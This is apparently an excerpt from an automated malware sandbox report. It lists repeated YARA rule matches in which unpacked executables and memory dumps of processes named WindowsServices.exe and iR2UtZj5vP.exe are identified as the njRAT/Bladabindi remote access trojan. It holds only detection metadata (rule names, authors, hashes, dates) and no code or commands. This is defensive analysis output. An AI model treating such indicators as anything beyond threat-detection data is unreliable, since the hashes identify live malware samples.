Source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c | date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: njrat1 | date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Njrat | hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 25.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT | author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c | date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: njrat1 | date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Njrat | hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 5.2.WindowsServices.exe.4f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT | author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c | date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: njrat1 | date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Njrat | hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT | author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c | date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: njrat1 | date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Njrat | hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 4.1.iR2UtZj5vP.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT | author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c | date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: njrat1 | date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Njrat | hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 25.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT | author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c | date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPE | Matched rule: njrat1 | date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Njrat | hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 1.2.iR2UtZj5vP.exe.2160000.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT | author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c | date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPE | Matched rule: njrat1 | date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPE | Matched rule: Njrat | hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 22.2.WindowsServices.exe.2150000.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT | author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c | date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: njrat1 | date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Njrat | hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT | author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c | date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPE | Matched rule: njrat1 | date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPE | Matched rule: Njrat | hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 5.2.WindowsServices.exe.4f0000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT | author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 | reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 14.2.WindowsServices.exe.2030000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 14.2.WindowsServices.exe.2030000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 1.2.iR2UtZj5vP.exe.2130000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000004.00000002.1423595922.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000019.00000001.1855089629.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000004.00000001.1338787516.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000012.00000002.1747188257.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
